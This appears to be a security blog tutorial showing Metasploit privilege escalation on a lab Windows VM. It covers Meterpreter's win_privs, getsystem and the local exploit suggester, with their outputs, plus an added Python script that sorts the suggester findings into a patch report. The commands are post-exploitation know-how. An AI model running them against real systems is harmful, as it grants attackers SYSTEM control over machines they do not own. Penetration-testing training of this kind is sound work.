8/07/2017

[MAD-METASPLOIT] 0x32 - Privilege Escalation




Checking privileges with win_privs


post/windows/gather/win_privs


meterpreter > run post/windows/gather/win_privs

Current User
============

 Is Admin  Is System  Is In Local Admin Group  UAC Enabled  Foreground ID  UID
 --------  ---------  -----------------------  -----------  -------------  ---
 False     False      True                     False        1              "HAHWUL\\Test-Virtualbox"

Windows Privileges
==================

 Name
 ----
 SeChangeNotifyPrivilege


Automatic privilege escalation with getsystem

meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
              0 : All techniques available
              1 : Named Pipe Impersonation (In Memory/Admin)
              2 : Named Pipe Impersonation (Dropper/Admin)
              3 : Token Duplication (In Memory/Admin)


meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).


Finding local exploits with local_exploit_suggester


meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.56.101 - Collecting local exploits for x86/windows...
[*] 192.168.56.101 - 37 exploit checks are being tried...
[+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
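
For the report or patch ticket that follows a run like this, the suggester output can be turned into a per-host list of missing Microsoft bulletins. This is an added example, not part of the original post or of Metasploit; the function name `triage`, the bucket names and the trimmed sample are assumptions, and the bulletin id is only read from the module name.

```python
import re

# Constructed sample: a subset of lines in the format printed by the run above.
SAMPLE = """\
[*] 192.168.56.101 - Collecting local exploits for x86/windows...
[*] 192.168.56.101 - 37 exploit checks are being tried...
[+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
"""

# "[+] <host> - <module path>: <check result message>"
FINDING = re.compile(r"^\[\+\]\s+(?P<host>\S+)\s+-\s+(?P<module>exploit/\S+?):\s+(?P<msg>.+)$")
# Module names such as ms10_092_schelevator carry the bulletin id MS10-092.
BULLETIN = re.compile(r"/ms(\d{2})_(\d{3})_")

def triage(text):
    """Return {host: {"likely": [...], "unconfirmed": [...]}} of (bulletin, module)."""
    report = {}
    for line in text.splitlines():
        m = FINDING.match(line.strip())
        if not m:
            continue  # [*] status lines and blank lines carry no finding
        b = BULLETIN.search(m["module"])
        bulletin = f"MS{b.group(1)}-{b.group(2)}" if b else None
        # "appears to be vulnerable" means the check passed; anything else is unverified.
        bucket = "likely" if "appears to be vulnerable" in m["msg"] else "unconfirmed"
        entry = report.setdefault(m["host"], {"likely": [], "unconfirmed": []})
        entry[bucket].append((bulletin, m["module"]))
    for entry in report.values():
        for items in entry.values():
            # Bulletins in order first, modules without a bulletin id last.
            items.sort(key=lambda x: (x[0] is None, x[0] or "", x[1]))
    return report

if __name__ == "__main__":
    for target, buckets in triage(SAMPLE).items():
        for bucket, items in buckets.items():
            for bulletin, module in items:
                print(target, bucket, bulletin or "no-bulletin-id", module)
```

Entries in the "unconfirmed" bucket only mean the related service was running, so they should be verified against the host's installed updates before being reported as missing patches.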






HAHWUL
